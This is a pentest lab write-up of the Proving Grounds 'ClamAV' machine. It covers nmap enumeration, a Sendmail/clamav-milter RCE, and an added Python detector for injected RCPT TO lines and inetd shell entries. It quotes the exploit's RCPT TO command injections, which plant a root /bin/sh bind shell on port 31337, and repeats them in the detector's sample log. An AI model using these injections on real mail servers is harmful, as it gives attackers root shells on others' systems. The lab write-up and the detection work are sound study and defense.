Zeyu's Pentesting Writeups
ClamAV
Writeup for ClamAV from Offensive Security Proving Grounds (PG)
Information Gathering
Service Enumeration
nmapAutomator.sh -H 192.168.66.42 -t full
nmapAutomator.sh -H 192.168.66.42 -t vulns
HTTP (80)
There is a page with a binary message.
Challenge accepted!
SMTP (25)
We can see that Sendmail 8.13.4 is used.
Exploitation
We find the following Sendmail + ClamAV RCE exploit on Exploit Database: "Sendmail with clamav-milter < 0.91.2 - Remote Command Execution".
The two key lines in the Perl script are:

print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";

The first appends an inetd entry that serves /bin/sh as root on port 31337; the second restarts inetd so the entry takes effect. Together they open port 31337 as a root bind shell.
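The two RCPT TO commands above are what a mail server or IDS would actually see on the wire, and the result is a new line in /etc/inetd.conf. As an added example (not part of the original writeup or the Exploit Database script), the following Python shows two defender-side checks: flagging RCPT TO addresses whose local part carries shell metacharacters (the shape of the clamav-milter injection), and auditing an inetd.conf for entries that hand a shell to a network port. The SMTP log format and the inetd.conf contents are constructed samples, not logs from the lab machine.

```python
import re

# Constructed sample SMTP transaction log (assumed format: timestamp, client IP, command).
# Lines 3 and 4 mirror the shape of the clamav-milter injection shown in the writeup.
SAMPLE_SMTP_LOG = """\
2024-01-01T10:00:01 192.0.2.10 RCPT TO:<alice@localhost>
2024-01-01T10:00:02 192.0.2.10 RCPT TO:<bob+newsletter@localhost>
2024-01-01T10:00:03 192.0.2.77 RCPT TO:<nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf"@localhost>
2024-01-01T10:00:04 192.0.2.77 RCPT TO:<nobody+"|/etc/init.d/inetd restart"@localhost>
"""

# Constructed /etc/inetd.conf sample: one normal service plus the injected entry.
SAMPLE_INETD_CONF = """\
# constructed sample, not a real host's file
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd
31337 stream tcp nowait root /bin/sh -i
"""

RCPT_RE = re.compile(r'RCPT TO:\s*<(?P<addr>.*)>', re.IGNORECASE)

# Characters that have no legitimate place in a recipient local part but are
# exactly what a command injection through the "+" extension needs.
SHELL_META = set('|;`$&')

# Interpreters that should never appear as an inetd service program.
SHELLS = {'/bin/sh', '/bin/bash', '/bin/dash', '/bin/ksh'}


def suspicious_rcpts(log_text):
    """Return (line_no, client_ip, address) for every RCPT TO whose local part
    contains shell metacharacters. Plus-addressing on its own is not flagged."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = RCPT_RE.search(line)
        if not m:
            continue
        addr = m.group('addr')
        local_part = addr.rsplit('@', 1)[0]
        if any(c in SHELL_META for c in local_part):
            fields = line.split()
            client_ip = fields[1] if len(fields) > 1 else '?'
            hits.append((n, client_ip, addr))
    return hits


def shell_services(conf_text):
    """Return (service_or_port, user, program) for inetd.conf entries whose
    program is a shell; this is the persistence the injected RCPT creates."""
    found = []
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        fields = line.split()
        # inetd.conf: service socket_type proto wait/nowait user program [args]
        if len(fields) < 6:
            continue
        service, _, _, _, user, program = fields[:6]
        if program in SHELLS:
            found.append((service, user, program))
    return found


if __name__ == '__main__':
    for n, ip, addr in suspicious_rcpts(SAMPLE_SMTP_LOG):
        print(f'line {n}: injection-shaped RCPT from {ip}: {addr}')
    for service, user, program in shell_services(SAMPLE_INETD_CONF):
        print(f'inetd serves {program} as {user} on {service}')
```

The SMTP check is deliberately narrow: a "+" tag alone is normal plus-addressing, so only metacharacters in the local part raise an alert. The inetd audit catches the resulting persistence regardless of how the line got there, which is the check worth scheduling on any host still running inetd.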
After running the script, the port is indeed open.
Upon connecting to the bind shell, run bash -i to upgrade to a fully interactive shell.